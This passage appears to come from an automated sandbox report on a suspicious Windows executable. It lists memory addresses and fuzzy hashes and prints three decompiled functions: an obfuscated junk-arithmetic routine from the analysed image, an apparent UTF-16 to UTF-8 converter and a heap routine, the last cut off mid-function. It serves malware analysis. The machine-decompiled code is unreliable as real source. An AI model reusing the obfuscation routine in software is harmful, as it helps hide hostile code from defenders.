0x0142dc43
0x00000000
0x0142dc45
0x0142dc45
0x0142dc47
0x00000000
0x0142dc4d
0x0142dc4d
0x0142dc50
0x0142dc52
0x0142dc55
0x0142dcfa
0x0142dcfe
0x0142dd08
0x0142dd0a
0x0142dd0c
0x00000000
0x0142dd12
0x0142dd15
0x0142dd2d
0x0142dd2f
0x0142dd32
0x0142dd35
0x00000000
0x0142dd35
0x0142dc5b
0x0142dc5b
0x0142dc5e
0x0142dc61
0x0142dc64
0x0142dc67
0x0142dc67
0x0142dc6a
0x0142dc6c
0x0142dc8e
0x0142dc8e
0x0142dc91
0x0142dc93
0x0142dcce
0x0142dcce
0x0142dc95
0x0142dc9c
0x0142dc6e
0x0142dc72
0x0142dc75
0x0142dc77
0x0142dc79
0x0147b551
0x0147b551
0x00000000
0x0142dc7f
0x0142dc7f
0x0142dc81
0x00000000
0x0142dc83
0x0142dc86
0x0142dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0142dc88
0x0142dc81
0x0142dc79
0x0142dc6c
0x0142dc55
0x0142dc47
0x0142dc43
0x00000000
0x0142dc36
0x0142dc23
0x00000000
0x0142dbff
0x0142dbf1
0x0142dbdf
0x0142db8f
0x0142db92
0x0142db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0142db95
0x0142db8d
0x0142db85
0x0142db74
0x0142dc9f
0x0142dca2
0x0142dcb0
0x0142dcb0
0x0142dad1
0x0147b4e5
0x0147b4c8
0x00000000
0x00000000
0x00000000
0x0142d831
0x00000000
0x0142d800
0x0147b47f
0x0147b485
0x00000000
0x0147b485
0x0142d665
0x0142d652
0x00000000

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4b1d0ca3a1231dd133e3591bf62801c8d1cc754eedfe27a0bee79c3547460e
Instruction ID: 4ac65f228a9a11f927696b02fac8dec5071f2a329cb9fa7fa4b9089cdf4c3d29
Opcode Fuzzy Hash: 8a4b1d0ca3a1231dd133e3591bf62801c8d1cc754eedfe27a0bee79c3547460e
Instruction Fuzzy Hash: 0BE1E330E0036A8FEB35CF99C884BAAB7B1BF95304F4501ABD9099B3A1D77499C5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0041E74D, Relevance: .3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E0041E74D(signed char __eax, signed char __ebx, signed int __ecx, signed int __edi, signed int __esi) {
				char _v5;
				char _v1243127611;
				signed int _t48;
				signed char _t54;
				signed int _t59;
				signed int _t61;
				signed int _t64;
				signed int _t66;
				signed char _t67;
				signed char _t68;
				signed char _t69;
				char _t70;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				signed int _t81;
				signed int _t82;
				signed char _t83;
				signed char _t85;
				signed int _t87;
				signed int _t94;
				signed int _t101;
				void* _t103;
				signed int _t110;

				_t94 = __esi;
				_t87 = __edi;
				_t61 = __ecx;
				_t54 = __ebx;
				_t41 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													do {
														do {
															do {
																do {
																	do {
																		L1:
																		_t94 = _t94 +  *0xacf3b4c1;
																		asm("adc edi, 0x787b6094");
																		_t66 =  *0x4c6bcd6a * 0xe7d5;
																		_t54 = _t54 |  *0xd360906d;
																		_push(_t66);
																		_t67 = _t66 - 0x14;
																		 *0xaf791567 =  *0xaf791567 + _t41;
																	} while ( *0xaf791567 >= 0);
																	 *0xefa65979 =  *0xefa65979 << 0x7e;
																	 *0x9e16d0f1 =  *0x9e16d0f1 | _t67;
																	_t68 = _t67 &  *0x8067731c;
																	_t94 = _t94 |  *0x332d416f;
																	asm("rol byte [0x6267de80], 0xbf");
																	asm("rcr dword [0xfd76d107], 0x7e");
																	 *0x62d9bdb6 =  *0x62d9bdb6 - _t68;
																	 *0x1878de3b =  *0x1878de3b | _t110;
																	asm("movsw");
																	 *0xc83183ea =  *0xc83183ea >> 0xcc;
																	 *0xdaab4fc9 =  *0xdaab4fc9 >> 0xa6;
																	 *0x84a6c1f1 =  *0x84a6c1f1 + _t68;
																	 *0x4a5d80c6 = _t41;
																	_t87 = (_t87 & 0xc59e8eef) - 1;
																	asm("adc ch, 0x24");
																	_t54 = (_t54 |  *0x3400739b) +  *0xeaf53e3;
																	_t41 = _t94;
																	asm("adc [0x57361bd], ebp");
																	 *0x733d94dd =  *0x733d94dd - _t87;
																	 *0x6d6a5700 =  *0x6d6a5700 << 0xe9;
																	_t61 = _t61 | 0x000000b6;
																	_t69 = _t68 |  *0x57f4980a;
																} while (_t69 != 0);
																_t41 = _t41 |  *0x2179bb83;
																_t61 = _t61 + 0x89782b62;
																_t54 = _t54 + 1;
																_pop( *0x26a5cab8);
																_t101 =  &_v1243127611 -  *0x95e26033;
																_pop(_t94);
																_pop( *0x38a994fd);
																asm("adc [0x86f8f509], esp");
																 *0x57075ef2 =  *0x57075ef2 >> 0xd;
																_t70 = _t69 + 0x24;
																 *0x7bec35d6 =  *0x7bec35d6 - _t101;
																asm("cmpsb");
																 *0x59f09f2c = _t70;
																 *0x7c82b32a =  *0x7c82b32a >> 0x12;
															} while ( *0x7c82b32a == 0);
															_t61 = _t61 |  *0x35ca3374;
															 *0x6da7d6dc =  *0x6da7d6dc & _t110;
															_t41 = _t41 -  *0xcb64abc0;
															_t94 = _t94 - 1;
														} while (_t94 != 0);
														 *0xdbe2a07a =  *0xdbe2a07a + _t54;
														_t87 =  *0xd546cc6b * 0x45df;
														_t71 =  *0xc8bd0361;
														 *0xc8bd0361 = _t70;
														_push(_t87);
														asm("adc ecx, [0xe23dd361]");
														_t61 = _t61 -  *0x41abd1c0;
														_t54 = _t54 + 1;
													} while (_t54 > 0);
													_t61 =  *0x1299027f * 0x4bbc;
												} while ( *0xa752b600 < _t71);
												asm("sbb edi, [0xbce24678]");
												asm("stosd");
												asm("ror dword [0x373117ee], 0x6e");
												asm("rcr byte [0x14eae7b7], 0x5");
												_t94 = _t94 + 0x3cd009c2;
												 *0x79b22ebe = _t110 + 1;
												 *0x15f67108 = _t54;
												asm("adc [0x4746ff28], dh");
												 *0xd66015ba =  *0xd66015ba << 0x97;
												 *0x880e21cf =  *0x880e21cf ^ _t101;
												_push( *0x27225327);
												asm("ror byte [0xcc914cb6], 0x95");
												asm("adc ecx, 0x7f21d1ea");
												 *0x428c5c12 =  *0x428c5c12 << 0x4d;
												_pop(_t64);
												 *0x49982f22 =  *0x49982f22 | _t41;
												 *0xf891e6f7 =  *0xf891e6f7 << 0xdb;
												asm("sbb edi, 0x1be94317");
												asm("scasb");
												 *0xf696d52b = 0x1a;
												_pop(_t77);
												 *0xe3581fed = _t77;
												_t110 =  *0x79b22ebe - 0xb6387cdf |  *0x3003e883 |  *0xc08ab8f0;
												_t79 =  *0xe3581fed - 0x80;
												_t87 = (_t87 |  *0x9ad1cb94) +  *0x65a70c17 - 1;
												_t41 = 0x3de5c3e4;
												asm("sbb edi, [0xc183679f]");
												_t61 =  *0xf9d5073d;
												 *0xf9d5073d = _t64;
												_t54 = (_t54 & 0x912eab3b) - 0x00000001 |  *0x567ad932;
											} while (_t54 < 0);
											_t94 =  *0x4898077c * 0x60e8;
											 *0x119fbefc =  *0x119fbefc << 0x60;
											asm("movsw");
											asm("scasd");
											_t81 = _t79 -  *0x5c9ae381 ^  *0x184abdc7;
											asm("ror dword [0xd1118cef], 0x81");
										} while (0x3de5c3e4 >=  *0x4209cd63);
										asm("scasb");
										_t61 = _t61 & 0xa3585bcd;
										_pop(_t54);
									} while (( *0x2bface25 & _t94) >= 0);
									asm("rcr dword [0x3c03c771], 0x16");
									_t61 =  *0x25bc8896;
									 *0x38d2613e =  *0x38d2613e & _t61;
									asm("cmpsb");
									_t82 = _t81 |  *0xd96cbaa3;
									_t28 = _t87;
									_t87 =  *0xa6962a15;
									 *0xa6962a15 = _t28;
									_t29 = _t94;
									_t94 =  *0x7ba44893;
									 *0x7ba44893 = _t29;
									 *0xda950eca =  *0xda950eca ^ _t54;
									 *0x3ad8089d =  *0x3ad8089d ^ _t110;
									_push(_t82);
									asm("rcl dword [0xeeb9e3f1], 0xd1");
									 *0xe6213bf6 =  *0xe6213bf6 << 5;
									 *0x8cbe68d9 =  *0x8cbe68d9 ^ _t82;
									asm("sbb eax, [0xdaf023c0]");
									_t41 = _t87;
									asm("adc cl, [0x895ad7e2]");
									asm("sbb edx, 0xa50e229f");
								} while (_t101 <= 0x990b7167);
								asm("adc ecx, [0x5b487576]");
								asm("lodsd");
								asm("lodsb");
								_pop(_t48);
								_push(_t110);
								_t87 =  *0x3972e99;
								_t30 = _t61 &  *0xcc8d6a3;
								_t61 =  *0x8e2a58c5;
								 *0x8e2a58c5 = _t30;
								_push( *0x75314a91);
								asm("sbb ecx, [0x3a5c4f97]");
								asm("scasb");
								 *0xebc37796 =  *0xebc37796 & _t48;
								asm("sbb [0x594f9fb5], bl");
								_t103 =  &_v5 -  *0x5c9a19b8;
								_t41 = 0x10;
								_push(0x10);
								asm("adc [0x527da81a], dh");
								 *0xca18f833 =  *0xca18f833 | 0x00000010;
							} while ( *0xca18f833 >= 0);
							 *0xbf0d6979 =  *0xbf0d6979 - _t82;
							_pop(_t94);
							 *0xbcfdbecf =  *0xbcfdbecf ^ _t94;
							_pop(_t110);
							 *0x9b9afb9b =  *0x9b9afb9b ^ _t110;
						} while (_t103 +  *0xad3f33d >= 0);
						_t94 = (_t94 | 0x2cbac679) + 0x040ac001 ^  *0x46ac581f;
						asm("lodsd");
						 *0x8fe302c9 =  *0x8fe302c9 << 0x1c;
						 *0xe16c1e14 =  *0xe16c1e14 >> 0xce;
						_pop( *0xe1cd1a67);
						_pop( *0x63a12106);
						asm("ror byte [0xf6881a84], 0xb4");
						 *0x852abe81 =  *0x852abe81 << 0xfc;
						asm("lodsb");
						asm("ror dword [0xb6fb7cf7], 0xed");
						_t59 = _t54 + 0x00000001 ^  *0x28507f89;
						asm("adc [0xef4273f6], cl");
						asm("sbb eax, [0x8a39881b]");
						asm("sbb [0x7d43d0db], esp");
						asm("rcr dword [0x1e5a5807], 0xf2");
						asm("adc ebx, 0x47d190bd");
						_t83 = _t82 +  *0xa14c1a1e;
						 *0x3cd717e5 =  *0x3cd717e5 & _t83;
						 *0xd8158fd5 = _t83;
						 *0x5edda7b1 =  *0x5edda7b1 + _t59;
						 *0xea76b19e = 0xc5a31efb;
						_t61 = _t94;
						 *0x45d459cd =  *0x45d459cd << 0xfe;
						 *0xef5bb9e3 =  *0xef5bb9e3 ^ _t61;
						_t110 = _t110 - 0x4342624;
						_t85 = _t110;
						 *0x53a5270c =  *0x53a5270c ^ _t85;
						asm("sbb edi, [0xf1575bfb]");
						_t54 = (_t59 &  *0x485c2f85) -  *0x4bed970e;
						_t87 = _t94;
						asm("adc ebp, [0x52ec9e16]");
						_t41 =  *0x8e48f8f1;
						 *0x8e48f8f1 = 0x5e +  *0xc832899d ^  *0x1e8919ea;
					} while ( *0xb4a7a093 >= _t87);
					asm("sbb [0x37130c73], ebx");
					_pop(_t61);
					 *0x111bd6be =  *0x111bd6be << 0x67;
					asm("adc ebx, [0xa92bb9c1]");
					asm("adc dl, 0x12");
					_push(_t94);
					_t54 = _t54 &  *0xe2ef9cb7;
					asm("rcl dword [0x3a3aa6eb], 0x89");
					 *0xbe70298 =  *0xbe70298 & _t61;
					_t94 = _t94 |  *0xec4a250d;
				} while (_t94 > 0);
				 *0xce5f7f77 =  *0xce5f7f77 | _t41;
				asm("sbb dh, [0x39580384]");
				return _t41 | 0x00000064;
			}

0x0041e74d
0x0041e74d
0x0041e74d
0x0041e74d
0x0041e74d
0x0041e74e
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e750
0x0041e756
0x0041e75c
0x0041e772
0x0041e778
0x0041e779
0x0041e77c
0x0041e782
0x0041e785
0x0041e78c
0x0041e792
0x0041e798
0x0041e79e
0x0041e7a5
0x0041e7ac
0x0041e7b2
0x0041e7b8
0x0041e7c5
0x0041e7d2
0x0041e7d9
0x0041e7df
0x0041e7e5
0x0041e7ed
0x0041e7f3
0x0041e7f9
0x0041e7fa
0x0041e800
0x0041e806
0x0041e813
0x0041e816
0x0041e816
0x0041e82e
0x0041e834
0x0041e83a
0x0041e83b
0x0041e847
0x0041e84d
0x0041e854
0x0041e85a
0x0041e860
0x0041e867
0x0041e86a
0x0041e870
0x0041e871
0x0041e877
0x0041e877
0x0041e884
0x0041e88a
0x0041e890
0x0041e896
0x0041e896
0x0041e89d
0x0041e8a3
0x0041e8ae
0x0041e8ae
0x0041e8b4
0x0041e8b5
0x0041e8bb
0x0041e8c1
0x0041e8c1
0x0041e8c8
0x0041e8d2
0x0041e8de
0x0041e8e4
0x0041e905
0x0041e90c
0x0041e913
0x0041e919
0x0041e925
0x0041e937
0x0041e93d
0x0041e944
0x0041e94a
0x0041e960
0x0041e967
0x0041e979
0x0041e980
0x0041e981
0x0041e98f
0x0041e99c
0x0041e9a2
0x0041e9a9
0x0041e9af
0x0041e9b0
0x0041e9bc
0x0041e9c2
0x0041e9c5
0x0041e9c7
0x0041e9cc
0x0041e9d2
0x0041e9d2
0x0041e9d8
0x0041e9d8
0x0041e9e4
0x0041e9ee
0x0041e9fb
0x0041e9fd
0x0041e9fe
0x0041ea04
0x0041ea0b
0x0041ea1d
0x0041ea1e
0x0041ea2a
0x0041ea2a
0x0041ea31
0x0041ea38
0x0041ea3e
0x0041ea44
0x0041ea45
0x0041ea4b
0x0041ea4b
0x0041ea4b
0x0041ea51
0x0041ea51
0x0041ea51
0x0041ea57
0x0041ea5d
0x0041ea75
0x0041ea76
0x0041ea83
0x0041ea8a
0x0041ea97
0x0041ea9d
0x0041ea9e
0x0041eaaa
0x0041eaaa
0x0041eab6
0x0041eabc
0x0041eac3
0x0041eac4
0x0041eac5
0x0041eac6
0x0041ead3
0x0041ead3
0x0041ead3
0x0041ead9
0x0041eadf
0x0041eae5
0x0041eae9
0x0041eaef
0x0041eafb
0x0041eb01
0x0041eb03
0x0041eb0a
0x0041eb10
0x0041eb10
0x0041eb1c
0x0041eb22
0x0041eb23
0x0041eb2f
0x0041eb36
0x0041eb3c
0x0041eb63
0x0041eb6c
0x0041eb6d
0x0041eb74
0x0041eb7b
0x0041eb81
0x0041eb8d
0x0041eb95
0x0041eb9c
0x0041eb9e
0x0041ebb1
0x0041ebc3
0x0041ebc9
0x0041ebd5
0x0041ebdb
0x0041ebe2
0x0041ebe8
0x0041ebef
0x0041ebfb
0x0041ec07
0x0041ec0d
0x0041ec13
0x0041ec1a
0x0041ec21
0x0041ec27
0x0041ec3b
0x0041ec3c
0x0041ec42
0x0041ec48
0x0041ec54
0x0041ec55
0x0041ec68
0x0041ec68
0x0041ec68
0x0041ec74
0x0041ec7a
0x0041ec7b
0x0041ec82
0x0041ec88
0x0041ec8b
0x0041ec8c
0x0041ec92
0x0041ec99
0x0041eca5
0x0041eca5
0x0041ecb1
0x0041ecb7
0x0041ecbf

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b036fb35a2681a57dfe4fe6b0f5daf74d7c1308c8b13fabe3f629f31148dd3
Instruction ID: 44e8b02125fc07359f7b51fb987f85456492658569e245924a8ed5904be1abe6
Opcode Fuzzy Hash: 54b036fb35a2681a57dfe4fe6b0f5daf74d7c1308c8b13fabe3f629f31148dd3
Instruction Fuzzy Hash: ABD1C832918795CFE716CF38D896A913FB2FB46320708469EC9A2974D2DB742456CF88

Uniqueness

Uniqueness Score: -1.00%

Function 0144EBB0, Relevance: .2, Instructions: 250
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0144EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E0144ED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}

0x0144ebb8
0x0144ebbf
0x0144ebc1
0x0144ebc6
0x00000000
0x0148b6d6
0x0144ebcd
0x0144ebd2
0x0144ec95
0x0148b6e0
0x0144ec9b
0x0144eca1
0x0144eca1
0x0144ec89
0x00000000
0x0144ec89
0x0144ebd8
0x0144ebdd
0x0148b6ea
0x00000000
0x0144ebe3
0x0144ebe5
0x0144ebe7
0x0144ebef
0x0144ebf2
0x00000000
0x0144ebf5
0x00000000
0x0144ebf5
0x0144ebf5
0x0144ebf7
0x0148b6f6
0x0144ec7c
0x0144ec7c
0x0144ec7f
0x0144ec82
0x0144ec87
0x00000000
0x0144ec87
0x0144ec1a
0x0144ec1a
0x0144ec25
0x0148b725
0x0148b72c
0x0148b72c
0x0144ec2d
0x0144ec31
0x0148b73c
0x0148b744
0x0148b748
0x0148b748
0x0148b749
0x0148b749
0x0148b74a
0x0148b74a
0x0144ec3e
0x0148b860
0x00000000
0x0144ec44
0x0144ec47
0x0148b750
0x0148b758
0x0148b767
0x0148b775
0x0148b77c
0x0148b77f
0x0148b769
0x0148b76c
0x0148b76c
0x0148b781
0x0148b788
0x0148b78b
0x0148b75a
0x0148b75d
0x0148b75d
0x0148b78d
0x0148b792
0x0148b793
0x0148b793
0x0144ec54
0x0144ec56
0x0144ec57
0x0144ec59
0x0144ec5e
0x0144ecaa
0x0144ed16
0x0144ed16
0x0144ecac
0x0144ecaf
0x0144ecb4
0x0144ecb6
0x0144ecb6
0x0144ecb9
0x0144ecbf
0x0148b7c1
0x0148b7c8
0x0148b7d3
0x0148b7db
0x0148b7ec
0x0148b858
0x00000000
0x0148b858
0x0148b7ee
0x0148b7f1
0x0148b7f4
0x0148b7ff
0x0148b850
0x00000000
0x0148b850
0x0148b80a
0x0148b813
0x0148b81c
0x0148b81d
0x0148b822
0x0148b825
0x0148b828
0x0148b831
0x0148b832
0x0148b837
0x0148b840
0x0148b842
0x0148b845
0x0148b848
0x00000000
0x0148b848
0x0148b7df
0x00000000
0x0148b7df
0x0148b7cc
0x00000000
0x0148b7cc
0x0144ecc5
0x0144ecc7
0x0144eccb
0x0148b79b
0x0148b79e
0x0148b7a4
0x00000000
0x00000000
0x0148b7a6
0x0148b7a8
0x0148b7a8
0x0144ecd3
0x00000000
0x00000000
0x00000000
0x00000000
0x0144ecd5
0x0144ecd5
0x0144ecd5
0x0144ecd8
0x0144ecda
0x0144ece4
0x00000000
0x00000000
0x0144ecea
0x0144eced
0x0144ecf0
0x0144ecf2
0x0144ecfb
0x0144ecfe
0x0144ed01
0x0144ed06
0x00000000
0x00000000
0x00000000
0x0144ed06
0x0148b7ae
0x0148b7b1
0x0148b7b7
0x00000000
0x00000000
0x0148b7b9
0x0148b7bb
0x0144ed08
0x0144ed08
0x0144ed0c
0x0144ed0c
0x00000000
0x0144ec60
0x0144ec62
0x0144ed0f
0x0144ed0f
0x00000000
0x0144ed0f
0x0144ec68
0x0144ec6c
0x0144ec6f
0x0144ec75
0x0144ec0d
0x0144ec0d
0x0144ec18
0x00000000
0x00000000
0x00000000
0x0144ec18
0x0144ec77
0x0144ec79
0x0144ec79
0x00000000
0x0144ec68
0x0144ec5e
0x0144ec3e
0x0144ebfd
0x0144ec02
0x0148b701
0x0148b70c
0x0148b71b
0x0148b71d
0x0148b71d
0x00000000
0x0148b70c
0x0144ec08
0x0144ec0a
0x00000000
0x0144ec0a
0x0144ebf5
0x0144ebf5

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: 8b3615517d4cfb5b150fd5b4f84b0e06f0bd36d0e7e35c936fd89f355f1b3822
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: AA814A21A043568FFB219E6CC8C127EBB51FF52214F2C467BD982AB361C239D847D796

Uniqueness

Uniqueness Score: -1.00%

Function 014E25DD, Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E014E25DD(intOrPtr __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E014E2E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x1506110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x1506110; // 0x86d24170
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x1506110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E0145D340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E0145D0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E0142FFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x13fac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x13fac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
